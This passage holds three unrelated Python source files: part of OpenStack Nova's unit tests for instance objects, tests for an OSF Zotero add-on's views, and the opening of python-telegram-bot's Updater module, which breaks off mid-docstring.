self.context, [fake_uuid]).AndReturn({fake_uuid: fake_faults})
self.mox.ReplayAll()
inst = instance.Instance.get_by_uuid(self.context, fake_uuid,
expected_attrs=['fault'])
self.assertEqual(fake_faults[0], dict(inst.fault.items()))
self.assertRemotes()
def test_iteritems_with_extra_attrs(self):
self.stubs.Set(instance.Instance, 'name', 'foo')
inst = instance.Instance(uuid='fake-uuid')
self.assertEqual(inst.items(),
{'uuid': 'fake-uuid',
'name': 'foo',
}.items())
def _test_metadata_change_tracking(self, which):
inst = instance.Instance(uuid='fake-uuid')
setattr(inst, which, {})
inst.obj_reset_changes()
getattr(inst, which)['foo'] = 'bar'
self.assertEqual(set([which]), inst.obj_what_changed())
inst.obj_reset_changes()
self.assertEqual(set(), inst.obj_what_changed())
def test_metadata_change_tracking(self):
self._test_metadata_change_tracking('metadata')
def test_system_metadata_change_tracking(self):
self._test_metadata_change_tracking('system_metadata')
def test_create_stubbed(self):
self.mox.StubOutWithMock(db, 'instance_create')
vals = {'host': 'foo-host',
'memory_mb': 128,
'system_metadata': {'foo': 'bar'}}
fake_inst = fake_instance.fake_db_instance(**vals)
db.instance_create(self.context, vals).AndReturn(fake_inst)
self.mox.ReplayAll()
inst = instance.Instance(host='foo-host', memory_mb=128,
system_metadata={'foo': 'bar'})
inst.create(self.context)
def test_create(self):
self.mox.StubOutWithMock(db, 'instance_create')
db.instance_create(self.context, {}).AndReturn(self.fake_instance)
self.mox.ReplayAll()
inst = instance.Instance()
inst.create(self.context)
self.assertEqual(self.fake_instance['id'], inst.id)
def test_create_with_values(self):
inst1 = instance.Instance(user_id=self.context.user_id,
project_id=self.context.project_id,
host='foo-host')
inst1.create(self.context)
self.assertEqual(inst1.host, 'foo-host')
inst2 = instance.Instance.get_by_uuid(self.context, inst1.uuid)
self.assertEqual(inst2.host, 'foo-host')
def test_create_with_numa_topology(self):
inst = instance.Instance(uuid=self.fake_instance['uuid'],
numa_topology=instance_numa_topology.InstanceNUMATopology
.obj_from_topology(
test_instance_numa_topology.fake_numa_topology))
inst.create(self.context)
self.assertIsNotNone(inst.numa_topology)
got_numa_topo = (
instance_numa_topology.InstanceNUMATopology
.get_by_instance_uuid(self.context, inst.uuid))
self.assertEqual(inst.numa_topology.id, got_numa_topo.id)
def test_recreate_fails(self):
inst = instance.Instance(user_id=self.context.user_id,
project_id=self.context.project_id,
host='foo-host')
inst.create(self.context)
self.assertRaises(exception.ObjectActionError, inst.create,
self.context)
def test_create_with_special_things(self):
self.mox.StubOutWithMock(db, 'instance_create')
fake_inst = fake_instance.fake_db_instance()
db.instance_create(self.context,
{'host': 'foo-host',
'security_groups': ['foo', 'bar'],
'info_cache': {'network_info': '[]'},
}
).AndReturn(fake_inst)
self.mox.ReplayAll()
secgroups = security_group.SecurityGroupList()
secgroups.objects = []
for name in ('foo', 'bar'):
secgroup = security_group.SecurityGroup()
secgroup.name = name
secgroups.objects.append(secgroup)
info_cache = instance_info_cache.InstanceInfoCache()
info_cache.network_info = network_model.NetworkInfo()
inst = instance.Instance(host='foo-host', security_groups=secgroups,
info_cache=info_cache)
inst.create(self.context)
def test_destroy_stubbed(self):
self.mox.StubOutWithMock(db, 'instance_destroy')
deleted_at = datetime.datetime(1955, 11, 6)
fake_inst = fake_instance.fake_db_instance(deleted_at=deleted_at,
deleted=True)
db.instance_destroy(self.context, 'fake-uuid',
constraint=None).AndReturn(fake_inst)
self.mox.ReplayAll()
inst = instance.Instance(id=1, uuid='fake-uuid', host='foo')
inst.destroy(self.context)
self.assertEqual(timeutils.normalize_time(inst.deleted_at),
timeutils.normalize_time(deleted_at))
self.assertTrue(inst.deleted)
def test_destroy(self):
values = {'user_id': self.context.user_id,
'project_id': self.context.project_id}
db_inst = db.instance_create(self.context, values)
inst = instance.Instance(id=db_inst['id'], uuid=db_inst['uuid'])
inst.destroy(self.context)
self.assertRaises(exception.InstanceNotFound,
db.instance_get_by_uuid, self.context,
db_inst['uuid'])
def test_destroy_host_constraint(self):
values = {'user_id': self.context.user_id,
'project_id': self.context.project_id,
'host': 'foo'}
db_inst = db.instance_create(self.context, values)
inst = instance.Instance.get_by_uuid(self.context, db_inst['uuid'])
inst.host = None
self.assertRaises(exception.ObjectActionError,
inst.destroy)
def test_name_does_not_trigger_lazy_loads(self):
values = {'user_id': self.context.user_id,
'project_id': self.context.project_id,
'host': 'foo'}
db_inst = db.instance_create(self.context, values)
inst = instance.Instance.get_by_uuid(self.context, db_inst['uuid'])
self.assertFalse(inst.obj_attr_is_set('fault'))
self.flags(instance_name_template='foo-%(uuid)s')
self.assertEqual('foo-%s' % db_inst['uuid'], inst.name)
self.assertFalse(inst.obj_attr_is_set('fault'))
def test_from_db_object_not_overwrite_info_cache(self):
info_cache = instance_info_cache.InstanceInfoCache()
inst = instance.Instance(context=self.context,
info_cache=info_cache)
db_inst = fake_instance.fake_db_instance()
db_inst['info_cache'] = dict(
test_instance_info_cache.fake_info_cache)
inst._from_db_object(self.context, inst, db_inst,
expected_attrs=['info_cache'])
self.assertIs(info_cache, inst.info_cache)
def test_compat_strings(self):
unicode_attributes = ['user_id', 'project_id', 'image_ref',
'kernel_id', 'ramdisk_id', 'hostname',
'key_name', 'key_data', 'host', 'node',
'user_data', 'availability_zone',
'display_name', 'display_description',
'launched_on', 'locked_by', 'os_type',
'architecture', 'vm_mode', 'root_device_name',
'default_ephemeral_device',
'default_swap_device', 'config_drive',
'cell_name']
inst = instance.Instance()
expected = {}
for key in unicode_attributes:
inst[key] = u'\u2603'
expected[key] = '?'
primitive = inst.obj_to_primitive(target_version='1.6')
self.assertEqual(expected, primitive['nova_object.data'])
self.assertEqual('1.6', primitive['nova_object.version'])
def test_compat_pci_devices(self):
inst = instance.Instance()
inst.pci_devices = pci_device.PciDeviceList()
primitive = inst.obj_to_primitive(target_version='1.5')
self.assertNotIn('pci_devices', primitive)
def test_compat_info_cache(self):
inst = instance.Instance()
inst.info_cache = instance_info_cache.InstanceInfoCache()
primitive = inst.obj_to_primitive(target_version='1.9')
self.assertEqual(
'1.4',
primitive['nova_object.data']['info_cache']['nova_object.version'])
def _test_get_flavor(self, namespace):
prefix = '%s_' % namespace if namespace is not None else ''
db_inst = db.instance_create(self.context, {
'user_id': self.context.user_id,
'project_id': self.context.project_id,
'system_metadata': flavors.save_flavor_info(
{}, flavors.get_default_flavor(), prefix)})
db_flavor = flavors.extract_flavor(db_inst, prefix)
inst = instance.Instance.get_by_uuid(self.context, db_inst['uuid'])
flavor = inst.get_flavor(namespace)
self.assertEqual(db_flavor['flavorid'], flavor.flavorid)
def test_get_flavor(self):
self._test_get_flavor(None)
self._test_get_flavor('foo')
def _test_set_flavor(self, namespace):
prefix = '%s_' % namespace if namespace is not None else ''
db_inst = db.instance_create(self.context, {
'user_id': self.context.user_id,
'project_id': self.context.project_id,
})
inst = instance.Instance.get_by_uuid(self.context, db_inst['uuid'])
db_flavor = flavors.get_default_flavor()
inst.set_flavor(db_flavor, namespace)
db_inst = db.instance_get(self.context, db_inst['id'])
self.assertEqual(
db_flavor['flavorid'], flavors.extract_flavor(
db_inst, prefix)['flavorid'])
def test_set_flavor(self):
self._test_set_flavor(None)
self._test_set_flavor('foo')
def test_delete_flavor(self):
namespace = 'foo'
prefix = '%s_' % namespace
db_inst = db.instance_create(self.context, {
'user_id': self.context.user_id,
'project_id': self.context.project_id,
'system_metadata': flavors.save_flavor_info(
{}, flavors.get_default_flavor(), prefix)})
inst = instance.Instance.get_by_uuid(self.context, db_inst['uuid'])
inst.delete_flavor(namespace)
db_inst = db.instance_get(self.context, db_inst['id'])
self.assertEqual({}, utils.instance_sys_meta(db_inst))
def test_delete_flavor_no_namespace_fails(self):
inst = instance.Instance(system_metadata={})
self.assertRaises(KeyError, inst.delete_flavor, None)
self.assertRaises(KeyError, inst.delete_flavor, '')
@mock.patch.object(db, 'instance_metadata_delete')
def test_delete_metadata_key(self, db_delete):
inst = instance.Instance(context=self.context,
id=1, uuid='fake-uuid')
inst.metadata = {'foo': '1', 'bar': '2'}
inst.obj_reset_changes()
inst.delete_metadata_key('foo')
self.assertEqual({'bar': '2'}, inst.metadata)
self.assertEqual({}, inst.obj_get_changes())
db_delete.assert_called_once_with(self.context, inst.uuid, 'foo')
def test_reset_changes(self):
inst = instance.Instance()
inst.metadata = {'1985': 'present'}
inst.system_metadata = {'1955': 'past'}
self.assertEqual({}, inst._orig_metadata)
inst.obj_reset_changes(['metadata'])
self.assertEqual({'1985': 'present'}, inst._orig_metadata)
self.assertEqual({}, inst._orig_system_metadata)
def test_load_generic_calls_handler(self):
inst = instance.Instance(context=self.context,
uuid='fake-uuid')
with mock.patch.object(inst, '_load_generic') as mock_load:
def fake_load(name):
inst.system_metadata = {}
mock_load.side_effect = fake_load
inst.system_metadata
mock_load.assert_called_once_with('system_metadata')
def test_load_fault_calls_handler(self):
inst = instance.Instance(context=self.context,
uuid='fake-uuid')
with mock.patch.object(inst, '_load_fault') as mock_load:
def fake_load():
inst.fault = None
mock_load.side_effect = fake_load
inst.fault
mock_load.assert_called_once_with()
@mock.patch('nova.objects.Instance.get_by_uuid')
def test_load_generic(self, mock_get):
inst2 = instance.Instance(metadata={'foo': 'bar'})
mock_get.return_value = inst2
inst = instance.Instance(context=self.context,
uuid='fake-uuid')
inst.metadata
self.assertEqual({'foo': 'bar'}, inst.metadata)
mock_get.assert_called_once_with(self.context,
uuid='fake-uuid',
expected_attrs=['metadata'])
self.assertNotIn('metadata', inst.obj_what_changed())
@mock.patch('nova.db.instance_fault_get_by_instance_uuids')
def test_load_fault(self, mock_get):
fake_fault = test_instance_fault.fake_faults['fake-uuid'][0]
mock_get.return_value = {'fake': [fake_fault]}
inst = instance.Instance(context=self.context, uuid='fake')
fault = inst.fault
mock_get.assert_called_once_with(self.context, ['fake'])
self.assertEqual(fake_fault['id'], fault.id)
self.assertNotIn('metadata', inst.obj_what_changed())
class TestInstanceObject(test_objects._LocalTest,
_TestInstanceObject):
pass
class TestRemoteInstanceObject(test_objects._RemoteTest,
_TestInstanceObject):
pass
class _TestInstanceListObject(object):
def fake_instance(self, id, updates=None):
fake_instance = fakes.stub_instance(id=2,
access_ipv4='1.2.3.4',
access_ipv6='::1')
fake_instance['scheduled_at'] = None
fake_instance['terminated_at'] = None
fake_instance['deleted_at'] = None
fake_instance['created_at'] = None
fake_instance['updated_at'] = None
fake_instance['launched_at'] = (
fake_instance['launched_at'].replace(
tzinfo=iso8601.iso8601.Utc(), microsecond=0))
fake_instance['info_cache'] = {'network_info': '[]',
'instance_uuid': fake_instance['uuid']}
fake_instance['security_groups'] = []
fake_instance['deleted'] = 0
if updates:
fake_instance.update(updates)
return fake_instance
def test_get_all_by_filters(self):
fakes = [self.fake_instance(1), self.fake_instance(2)]
self.mox.StubOutWithMock(db, 'instance_get_all_by_filters')
db.instance_get_all_by_filters(self.context, {'foo': 'bar'}, 'uuid',
'asc', limit=None, marker=None,
columns_to_join=['metadata'],
use_slave=False).AndReturn(fakes)
self.mox.ReplayAll()
inst_list = instance.InstanceList.get_by_filters(
self.context, {'foo': 'bar'}, 'uuid', 'asc',
expected_attrs=['metadata'], use_slave=False)
for i in range(0, len(fakes)):
self.assertIsInstance(inst_list.objects[i], instance.Instance)
self.assertEqual(inst_list.objects[i].uuid, fakes[i]['uuid'])
self.assertRemotes()
def test_get_all_by_filters_works_for_cleaned(self):
fakes = [self.fake_instance(1),
self.fake_instance(2, updates={'deleted': 2,
'cleaned': None})]
self.context.read_deleted = 'yes'
self.mox.StubOutWithMock(db, 'instance_get_all_by_filters')
db.instance_get_all_by_filters(self.context,
{'deleted': True, 'cleaned': False},
'uuid', 'asc', limit=None, marker=None,
columns_to_join=['metadata'],
use_slave=False).AndReturn(
[fakes[1]])
self.mox.ReplayAll()
inst_list = instance.InstanceList.get_by_filters(
self.context, {'deleted': True, 'cleaned': False}, 'uuid', 'asc',
expected_attrs=['metadata'], use_slave=False)
self.assertEqual(1, len(inst_list))
self.assertIsInstance(inst_list.objects[0], instance.Instance)
self.assertEqual(inst_list.objects[0].uuid, fakes[1]['uuid'])
self.assertRemotes()
def test_get_by_host(self):
fakes = [self.fake_instance(1),
self.fake_instance(2)]
self.mox.StubOutWithMock(db, 'instance_get_all_by_host')
db.instance_get_all_by_host(self.context, 'foo',
columns_to_join=None,
use_slave=False).AndReturn(fakes)
self.mox.ReplayAll()
inst_list = instance.InstanceList.get_by_host(self.context, 'foo')
for i in range(0, len(fakes)):
self.assertIsInstance(inst_list.objects[i], instance.Instance)
self.assertEqual(inst_list.objects[i].uuid, fakes[i]['uuid'])
self.assertEqual(inst_list.objects[i]._context, self.context)
self.assertEqual(inst_list.obj_what_changed(), set())
self.assertRemotes()
def test_get_by_host_and_node(self):
fakes = [self.fake_instance(1),
self.fake_instance(2)]
self.mox.StubOutWithMock(db, 'instance_get_all_by_host_and_node')
db.instance_get_all_by_host_and_node(self.context, 'foo', 'bar'
).AndReturn(fakes)
self.mox.ReplayAll()
inst_list = instance.InstanceList.get_by_host_and_node(self.context,
'foo', 'bar')
for i in range(0, len(fakes)):
self.assertIsInstance(inst_list.objects[i], instance.Instance)
self.assertEqual(inst_list.objects[i].uuid, fakes[i]['uuid'])
self.assertRemotes()
def test_get_by_host_and_not_type(self):
fakes = [self.fake_instance(1),
self.fake_instance(2)]
self.mox.StubOutWithMock(db, 'instance_get_all_by_host_and_not_type')
db.instance_get_all_by_host_and_not_type(self.context, 'foo',
type_id='bar').AndReturn(
fakes)
self.mox.ReplayAll()
inst_list = instance.InstanceList.get_by_host_and_not_type(
self.context, 'foo', 'bar')
for i in range(0, len(fakes)):
self.assertIsInstance(inst_list.objects[i], instance.Instance)
self.assertEqual(inst_list.objects[i].uuid, fakes[i]['uuid'])
self.assertRemotes()
def test_get_hung_in_rebooting(self):
fakes = [self.fake_instance(1),
self.fake_instance(2)]
dt = timeutils.isotime()
self.mox.StubOutWithMock(db, 'instance_get_all_hung_in_rebooting')
db.instance_get_all_hung_in_rebooting(self.context, dt).AndReturn(
fakes)
self.mox.ReplayAll()
inst_list = instance.InstanceList.get_hung_in_rebooting(self.context,
dt)
for i in range(0, len(fakes)):
self.assertIsInstance(inst_list.objects[i], instance.Instance)
self.assertEqual(inst_list.objects[i].uuid, fakes[i]['uuid'])
self.assertRemotes()
def test_get_active_by_window_joined(self):
fakes = [self.fake_instance(1), self.fake_instance(2)]
# NOTE(mriedem): Send in a timezone-naive datetime since the
# InstanceList.get_active_by_window_joined method should convert it
# to tz-aware for the DB API call, which we'll assert with our stub.
dt = timeutils.utcnow()
def fake_instance_get_active_by_window_joined(context, begin, end,
project_id, host):
# make sure begin is tz-aware
self.assertIsNotNone(begin.utcoffset())
self.assertIsNone(end)
return fakes
with mock.patch.object(db, 'instance_get_active_by_window_joined',
fake_instance_get_active_by_window_joined):
inst_list = instance.InstanceList.get_active_by_window_joined(
self.context, dt)
for fake, obj in zip(fakes, inst_list.objects):
self.assertIsInstance(obj, instance.Instance)
self.assertEqual(obj.uuid, fake['uuid'])
self.assertRemotes()
def test_with_fault(self):
fake_insts = [
fake_instance.fake_db_instance(uuid='fake-uuid', host='host'),
fake_instance.fake_db_instance(uuid='fake-inst2', host='host'),
]
fake_faults = test_instance_fault.fake_faults
self.mox.StubOutWithMock(db, 'instance_get_all_by_host')
self.mox.StubOutWithMock(db, 'instance_fault_get_by_instance_uuids')
db.instance_get_all_by_host(self.context, 'host',
columns_to_join=[],
use_slave=False
).AndReturn(fake_insts)
db.instance_fault_get_by_instance_uuids(
self.context, [x['uuid'] for x in fake_insts]
).AndReturn(fake_faults)
self.mox.ReplayAll()
instances = instance.InstanceList.get_by_host(self.context, 'host',
expected_attrs=['fault'],
use_slave=False)
self.assertEqual(2, len(instances))
self.assertEqual(fake_faults['fake-uuid'][0],
dict(instances[0].fault.iteritems()))
self.assertIsNone(instances[1].fault)
def test_fill_faults(self):
self.mox.StubOutWithMock(db, 'instance_fault_get_by_instance_uuids')
inst1 = instance.Instance(uuid='uuid1')
inst2 = instance.Instance(uuid='uuid2')
insts = [inst1, inst2]
for inst in insts:
inst.obj_reset_changes()
db_faults = {
'uuid1': [{'id': 123,
'instance_uuid': 'uuid1',
'code': 456,
'message': 'Fake message',
'details': 'No details',
'host': 'foo',
'deleted': False,
'deleted_at': None,
'updated_at': None,
'created_at': None,
}
]}
db.instance_fault_get_by_instance_uuids(self.context,
[x.uuid for x in insts],
).AndReturn(db_faults)
self.mox.ReplayAll()
inst_list = instance.InstanceList()
inst_list._context = self.context
inst_list.objects = insts
faulty = inst_list.fill_faults()
self.assertEqual(faulty, ['uuid1'])
self.assertEqual(inst_list[0].fault.message,
db_faults['uuid1'][0]['message'])
self.assertIsNone(inst_list[1].fault)
for inst in inst_list:
self.assertEqual(inst.obj_what_changed(), set())
def test_get_by_security_group(self):
fake_secgroup = dict(test_security_group.fake_secgroup)
fake_secgroup['instances'] = [
fake_instance.fake_db_instance(id=1,
system_metadata={'foo': 'bar'}),
fake_instance.fake_db_instance(id=2),
]
with mock.patch.object(db, 'security_group_get') as sgg:
sgg.return_value = fake_secgroup
secgroup = security_group.SecurityGroup()
secgroup.id = fake_secgroup['id']
instances = instance.InstanceList.get_by_security_group(
self.context, secgroup)
self.assertEqual(2, len(instances))
self.assertEqual([1, 2], [x.id for x in instances])
self.assertTrue(instances[0].obj_attr_is_set('system_metadata'))
self.assertEqual({'foo': 'bar'}, instances[0].system_metadata)
class TestInstanceListObject(test_objects._LocalTest,
_TestInstanceListObject):
pass
class TestRemoteInstanceListObject(test_objects._RemoteTest,
_TestInstanceListObject):
pass
class TestInstanceObjectMisc(test.NoDBTestCase):
def test_expected_cols(self):
self.stubs.Set(instance, '_INSTANCE_OPTIONAL_JOINED_FIELDS', ['bar'])
self.assertEqual(['bar'], instance._expected_cols(['foo', 'bar']))
self.assertIsNone(instance._expected_cols(None))
| |
# -*- coding: utf-8 -*-
from nose.tools import * # noqa
import mock
from tests.base import OsfTestCase
from tests.factories import AuthUserFactory, ProjectFactory
import urlparse
from framework.auth.core import Auth
from website.addons.zotero.tests.factories import (
ZoteroAccountFactory,
ZoteroUserSettingsFactory,
ZoteroNodeSettingsFactory
)
from website.addons.zotero import views
from utils import mock_responses
API_URL = 'https://api.zotero.org'
class MockNode(object):
addon = None
@property
def is_deleted(self):
return False
@property
def is_public(self):
return True
def get_addon(self, name):
if name == 'zotero':
return self.addon
return None
class ZoteroViewsTestCase(OsfTestCase):
def setUp(self):
super(ZoteroViewsTestCase, self).setUp()
self.account = ZoteroAccountFactory()
self.user = AuthUserFactory(external_accounts=[self.account])
self.account.display_name = self.user.fullname
self.account.save()
self.user_addon = ZoteroUserSettingsFactory(owner=self.user, external_account=self.account)
self.project = ProjectFactory(creator=self.user)
self.node_addon = ZoteroNodeSettingsFactory(owner=self.project)
self.node_addon.set_auth(external_account=self.account, user=self.user)
#self.user_addon.grant_oauth_access(self.node_addon, self.account, metadata={'lists': 'list'})
self.node = MockNode()
self.node.addon = self.node_addon
self.id_patcher = mock.patch('website.addons.zotero.model.Zotero.client_id')
self.secret_patcher = mock.patch('website.addons.zotero.model.Zotero.client_secret')
self.id_patcher.__get__ = mock.Mock(return_value='1234567890asdf')
self.secret_patcher.__get__ = mock.Mock(return_value='1234567890asdf')
self.id_patcher.start()
self.secret_patcher.start()
def tearDown(self):
self.id_patcher.stop()
self.secret_patcher.stop()
def test_serialize_settings_authorizer(self):
#"""dict: a serialized version of user-specific addon settings"""
res = self.app.get(
self.project.api_url_for('zotero_get_config'),
auth=self.user.auth,
)
assert_true(res.json['nodeHasAuth'])
assert_true(res.json['userHasAuth'])
assert_true(res.json['userIsOwner'])
assert_equal(res.json['folder'], '')
assert_equal(res.json['ownerName'], self.user.fullname)
assert_true(res.json['urls']['auth'])
assert_true(res.json['urls']['config'])
assert_true(res.json['urls']['deauthorize'])
assert_true(res.json['urls']['folders'])
assert_true(res.json['urls']['importAuth'])
assert_true(res.json['urls']['settings'])
def test_serialize_settings_non_authorizer(self):
#"""dict: a serialized version of user-specific addon settings"""
non_authorizing_user = AuthUserFactory()
self.project.add_contributor(non_authorizing_user, save=True)
res = self.app.get(
self.project.api_url_for('zotero_get_config'),
auth=non_authorizing_user.auth,
)
assert_true(res.json['nodeHasAuth'])
assert_false(res.json['userHasAuth'])
assert_false(res.json['userIsOwner'])
assert_equal(res.json['folder'], '')
assert_equal(res.json['ownerName'], self.user.fullname)
assert_true(res.json['urls']['auth'])
assert_true(res.json['urls']['config'])
assert_true(res.json['urls']['deauthorize'])
assert_true(res.json['urls']['folders'])
assert_true(res.json['urls']['importAuth'])
assert_true(res.json['urls']['settings'])
def test_set_auth(self):
res = self.app.post_json(
self.project.api_url_for('zotero_add_user_auth'),
{
'external_account_id': self.account._id,
},
auth=self.user.auth,
)
assert_equal(
res.status_code,
200
)
assert_true(res.json['result']['userHasAuth'])
assert_equal(
self.node_addon.user_settings,
self.user_addon
)
assert_equal(
self.node_addon.external_account,
self.account
)
def test_remove_user_auth(self):
self.node_addon.set_auth(self.account, self.user)
self.node_addon.save()
res = self.app.delete_json(
self.project.api_url_for('zotero_remove_user_auth'),
{
'external_account_id': self.account._id,
},
auth=self.user.auth,
)
assert_equal(
res.status_code,
200
)
self.node_addon.reload()
assert_is_none(self.node_addon.user_settings)
assert_is_none(self.node_addon.external_account)
def test_set_config_owner(self):
# Settings config updates node settings
self.node_addon.associated_user_settings = []
self.node_addon.save()
res = self.app.put_json(
self.project.api_url_for('zotero_set_config'),
{
'external_account_id': self.account._id,
'external_list_id': 'list',
},
auth=self.user.auth,
)
self.node_addon.reload()
assert_equal(self.user_addon, self.node_addon.user_settings)
assert_equal(res.json, {})
def test_set_config_not_owner(self):
user = AuthUserFactory()
user.add_addon('zotero')
self.project.add_contributor(user)
self.project.save()
res = self.app.put_json(
self.project.api_url_for('zotero_set_config'),
{
'external_account_id': self.account._id,
'external_list_id': 'list',
},
auth=user.auth,
)
self.node_addon.reload()
assert_equal(self.user_addon, self.node_addon.user_settings)
assert_equal(res.json, {})
def test_zotero_widget_view_complete(self):
# JSON: everything a widget needs
assert_false(self.node_addon.complete)
assert_equal(self.node_addon.zotero_list_id, None)
self.node_addon.set_target_folder('ROOT-ID', 'ROOT', auth=Auth(user=self.user))
res = views.zotero_widget(node_addon=self.node_addon,
project=self.project,
node=self.node,
nid=self.node_addon._id,
pid=self.project._id,
auth=self.user.auth)
assert_true(res['complete'])
assert_equal(res['list_id'], 'ROOT-ID')
def test_widget_view_incomplete(self):
# JSON: tell the widget when it hasn't been configured
assert_false(self.node_addon.complete)
assert_equal(self.node_addon.zotero_list_id, None)
res = views.zotero_widget(node_addon=self.node_addon,
project=self.project,
node=self.node,
nid=self.node_addon._id,
pid=self.project._id,
auth=self.user.auth)
assert_false(res['complete'])
assert_is_none(res['list_id'])
@responses.activate
def test_zotero_citation_list_root(self):
responses.add(
responses.GET,
urlparse.urljoin(
API_URL,
'users/{}/collections'.format(self.account.provider_id)
),
body=mock_responses['folders'],
content_type='application/json'
)
res = self.app.get(
self.project.api_url_for('zotero_citation_list'),
auth=self.user.auth
)
root = res.json['contents'][0]
assert_equal(root['kind'], 'folder')
assert_equal(root['id'], 'ROOT')
assert_equal(root['parent_list_id'], '__')
@responses.activate
def test_zotero_citation_list_non_root(self):
responses.add(
responses.GET,
urlparse.urljoin(
API_URL,
'users/{}/collections'.format(self.account.provider_id)
),
body=mock_responses['folders'],
content_type='application/json'
)
responses.add(
responses.GET,
urlparse.urljoin(
API_URL,
'users/{}/items'.format(self.account.provider_id)
),
body=mock_responses['documents'],
content_type='application/json'
)
res = self.app.get(
self.project.api_url_for('zotero_citation_list', zotero_list_id='ROOT'),
auth=self.user.auth
)
children = res.json['contents']
assert_equal(len(children), 7)
assert_equal(children[0]['kind'], 'folder')
assert_equal(children[1]['kind'], 'file')
assert_true(children[1].get('csl') is not None)
@responses.activate
def test_zotero_citation_list_non_linked_or_child_non_authorizer(self):
non_authorizing_user = AuthUserFactory()
self.project.add_contributor(non_authorizing_user, save=True)
self.node_addon.zotero_list_id = 'e843da05-8818-47c2-8c37-41eebfc4fe3f'
self.node_addon.save()
responses.add(
responses.GET,
urlparse.urljoin(
API_URL,
'users/{}/collections'.format(self.account.provider_id)
),
body=mock_responses['folders'],
content_type='application/json'
)
responses.add(
responses.GET,
urlparse.urljoin(
API_URL,
'users/{}/items'.format(self.account.provider_id)
),
body=mock_responses['documents'],
content_type='application/json'
)
res = self.app.get(
self.project.api_url_for('zotero_citation_list', zotero_list_id='ROOT'),
auth=non_authorizing_user.auth,
expect_errors=True
)
assert_equal(res.status_code, 403)
| |
#!/usr/bin/env python
#
# A library that provides a Python interface to the Telegram Bot API
# Copyright (C) 2015-2017
# Leandro Toledo de Souza <devs@python-telegram-bot.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser Public License for more details.
#
# You should have received a copy of the GNU Lesser Public License
# along with this program. If not, see [http://www.gnu.org/licenses/].
"""This module contains the class Updater, which tries to make creating Telegram bots intuitive."""
import logging
import os
import ssl
import warnings
from threading import Thread, Lock, current_thread, Event
from time import sleep
import subprocess
from signal import signal, SIGINT, SIGTERM, SIGABRT
from queue import Queue
from telegram import Bot, TelegramError
from telegram.ext import Dispatcher, JobQueue
from telegram.error import Unauthorized, InvalidToken, RetryAfter
from telegram.utils.request import Request
from telegram.utils.webhookhandler import (WebhookServer, WebhookHandler)
logging.getLogger(__name__).addHandler(logging.NullHandler())
class Updater(object):
"""
This class, which employs the :class:`telegram.ext.Dispatcher`, provides a frontend to
:class:`telegram.Bot` to the programmer, so they can focus on coding the bot. Its purpose is to
receive the updates from Telegram and to deliver them to said dispatcher. It also runs in a
separate thread, so the user can interact with the bot, for example on the command line. The
dispatcher supports handlers for different kinds of data: Updates from Telegram, basic text
commands and even arbitrary types. The updater can be started as a polling service or, for
production, use a webhook to receive updates. This is achieved using the WebhookServer and
WebhookHandler classes.
Attributes:
bot (:class:`telegram.Bot`): The bot used with this Updater.
user_sig_handler (:obj:`signal`): signals the updater will respond to.
update_queue (:obj:`Queue`): Queue for the updates.
job_queue (:class:`telegram.ext.JobQueue`): Jobqueue for the updater.
dispatcher (:class:`telegram.ext.Dispatcher`): Dispatcher that handles the updates and
dispatches them to the handlers.
running (:obj:`bool`): Indicates if the updater is running.
Args:
token (:obj:`str`, optional): The bot's token given by the @BotFather.
base_url (:obj:`str`, optional): Base_url for the bot.
workers (:obj:`int`, optional): Amount of threads in the thread pool for functions
decorated with ``@run_async``.
bot (:class:`telegram.Bot`, optional): A pre-initialized bot instance. If a pre-initialized
bot is used, it is the user's responsibility to create it using a `Request`
instance with a large enough connection pool.
user_sig_handler (:obj:`function`, optional): Takes ``signum, frame`` as positional
arguments. This will be called when a signal is received, defaults are (SIGINT,
SIGTERM, SIGABRT) setable with :attr:`idle`.
request_kwargs (:obj:`dict`, optional): Keyword args to control the creation of a request
object (ignored if `bot` argument is used).
Note:
You must supply either a :attr:`bot` or a :attr:`token` argument.
Raises:
ValueError: If both :attr:`token` and :attr:`bot` are passed or none of them.
"""
_request = None
def __init__(self,
token=None,
base_url=None,
workers=4,
bot=None,
user_sig_handler=None,
request_kwargs=None):
if (token is None) and (bot is None):
raise ValueError('`token` or `bot` must be passed')
if (token is not None) and (bot is not None):
raise ValueError('`token` and `bot` are mutually exclusive')
self.logger = logging.getLogger(__name__)
con_pool_size = workers + 4
if bot is not None:
self.bot = bot
if bot.request.con_pool_size < con_pool_size:
self.logger.warning(
'Connection pool of Request object is smaller than optimal value (%s)',
con_pool_size)
else:
# we need a connection pool the size of:
# * for each of the workers
# * 1 for Dispatcher
# * 1 for polling Updater (even if webhook is used, we can spare a connection)
# * 1 for JobQueue
# * 1 for main thread
if request_kwargs is None:
request_kwargs = {}
if 'con_pool_size' not in request_kwargs:
request_kwargs['con_pool_size'] = con_pool_size
self._request = Request(**request_kwargs)
self.bot = Bot(token, base_url, request=self._request)
self.user_sig_handler = user_sig_handler
self.update_queue = Queue()
self.job_queue = JobQueue(self.bot)
self.__exception_event = Event()
self.dispatcher = Dispatcher(
self.bot,
self.update_queue,
job_queue=self.job_queue,
workers=workers,
exception_event=self.__exception_event)
self.last_update_id = 0
self.running = False
self.is_idle = False
self.httpd = None
self.__lock = Lock()
self.__threads = []
def _init_thread(self, target, name, *args, **kwargs):
thr = Thread(target=self._thread_wrapper, name=name, args=(target,) + args, kwargs=kwargs)
thr.start()
self.__threads.append(thr)
def _thread_wrapper(self, target, *args, **kwargs):
thr_name = current_thread().name
self.logger.debug('{0} - started'.format(thr_name))
try:
target(*args, **kwargs)
except Exception:
self.__exception_event.set()
self.logger.exception('unhandled exception')
raise
self.logger.debug('{0} - ended'.format(thr_name))
def start_polling(self,
poll_interval=0.0,
timeout=10,
network_delay=None,
clean=False,
bootstrap_retries=0,
read_latency=2.,
allowed_updates=None):
"""Starts polling updates from Telegram.
Args:
poll_interval (:obj:`float`, optional): Time to wait between polling updates from
Telegram in seconds. Default is 0.0.
timeout (:obj:`float`, optional): Passed to :attr:`telegram.Bot.get_updates`.
clean (:obj:`bool`, optional): Whether to clean any pending updates on Telegram servers
before actually starting to poll. Default is False.
bootstrap_retries (:obj:`int`, optional): Whether the bootstrapping phase of the
`Updater` will retry on failures on the Telegram server.
* < 0 - retry indefinitely
* 0 - no retries (default)
* > 0 - retry up to X times
allowed_updates (List[:obj:`str`], optional): Passed to
